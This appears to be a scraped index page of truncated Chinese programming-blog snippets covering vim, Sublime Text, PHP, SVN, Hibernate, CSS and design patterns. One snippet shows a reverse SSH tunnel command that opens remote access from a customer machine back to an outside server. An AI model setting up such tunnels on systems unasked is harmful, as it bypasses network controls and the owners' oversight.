mac在/usr/share/vim/vimrc linux在/etc/vimrc 1、问：后退键不能删除数据，不能往后退怎么办？答：在vimrc中加入set backspace=2 2、问：如何控制tab键的缩进？答：在vimrc中加入set tabstop=4 (任何
Sublime Text 快捷键 daizj 快捷键 sublime
[size=large][/size]Sublime Text快捷键：Ctrl+Shift+P：打开命令面板Ctrl+P：搜索项目中的文件Ctrl+G：跳转到第几行Ctrl+W：关闭当前打开文件Ctrl+Shift+W：关闭所有打开文件Ctrl+Shift+V：粘贴并格式化Ctrl+D：选择单词，重复可增加选择下一个相同的单词Ctrl+L：选择行，重复可依次增加选择下一行Ctrl+Shift+L：
php 引用(&)详解 dcj3sjt126com PHP
在PHP 中引用的意思是：不同的名字访问同一个变量内容. 与Ｃ语言中的指针是有差别的．Ｃ语言中的指针里面存储的是变量的内容在内存中存放的地址变量的引用 PHP 的引用允许你用两个变量来指向同一个内容复制代码代码如下: <? $a="ABC"; $b =&$a; echo
SVN中trunk,branches,tags用法详解 dcj3sjt126com SVN
Subversion有一个很标准的目录结构，是这样的。比如项目是proj，svn地址为svn://proj/，那么标准的svn布局是svn://proj/|+-trunk+-branches+-tags这是一个标准的布局，trunk为主开发目录，branches为分支开发目录，tags为tag存档目录（不允许修改）。但是具体这几个目录应该如何使用，svn并没有明确的规范，更多的还是用户自己的习惯。
对软件设计的思考 e200702084 设计模式数据结构算法 ssh 活动
软件设计的宏观与微观软件开发是一种高智商的开发活动。一个优秀的软件设计人员不仅要从宏观上把握软件之间的开发，也要从微观上把握软件之间的开发。宏观上，可以应用面向对象设计，采用流行的SSH架构，采用web层，业务逻辑层，持久层分层架构。采用设计模式提供系统的健壮性和可维护性。微观上，对于一个类，甚至方法的调用，从计算机的角度模拟程序的运行情况。了解内存分配，参数传
同步、异步、阻塞、非阻塞 geeksun 非阻塞
同步、异步、阻塞、非阻塞这几个概念有时有点混淆，在此文试图解释一下。同步：发出方法调用后，当没有返回结果，当前线程会一直在等待（阻塞）状态。场景：打电话，营业厅窗口办业务、B/S架构的http请求-响应模式。异步：方法调用后不立即返回结果，调用结果通过状态、通知或回调通知方法调用者或接收者。异步方法调用后，当前线程不会阻塞，会继续执行其他任务。实现：
Reverse SSH Tunnel 反向打洞實錄 hongtoushizi ssh
實際的操作步驟： # 首先，在客戶那理的機器下指令連回我們自己的 Server，並設定自己 Server 上的 12345 port 會對應到幾器上的 SSH port ssh -NfR 12345:localhost:22 [email protected] # 然後在 myhost 的機器上連自己的 12345 port，就可以連回在客戶那的機器 ssh localhost -p 1
Hibernate中的缓存 Josh_Persistence 一级缓存 Hiberante缓存查询缓存二级缓存
Hibernate中的缓存一、Hiberante中常见的三大缓存：一级缓存，二级缓存和查询缓存。 Hibernate中提供了两级Cache，第一级别的缓存是Session级别的缓存，它是属于事务范围的缓存。这一级别的缓存是由hibernate管理的，一般情况下无需进行干预；第二级别的缓存是SessionFactory级别的缓存，它是属于进程范围或群集范围的缓存。这一级别的缓存
对象关系行为模式之延迟加载 home198979 PHP 架构延迟加载
形象化设计模式实战 HELLO!架构一、概念 Lazy Load：一个对象，它虽然不包含所需要的所有数据，但是知道怎么获取这些数据。延迟加载貌似很简单，就是在数据需要时再从数据库获取，减少数据库的消耗。但这其中还是有不少技巧的。二、实现延迟加载实现Lazy Load主要有四种方法：延迟初始化、虚
xml 验证 pengfeicao521 xml xml解析
有些字符，xml不能识别，用jdom或者dom4j解析的时候就报错 public static void testPattern() { // 含有非法字符的串 String str = "Jamey친Ñ&#1282
div设置半透明效果 spjich css 半透明
为div设置如下样式： div{filter:alpha(Opacity=80);-moz-opacity:0.5;opacity: 0.5;} 说明： 1、filter：对win IE设置半透明滤镜效果，filter:alpha(Opacity=80)代表该对象80%半透明，火狐浏览器不认2、-moz-opaci
你真的了解单例模式么？ w574240966 java 单例设计模式 jvm
单例模式，很多初学者认为单例模式很简单，并且认为自己已经掌握了这种设计模式。但事实上，你真的了解单例模式了么。一，单例模式的5中写法。（回字的四种写法，哈哈。） 1，懒汉式（1）线程不安全的懒汉式 public cla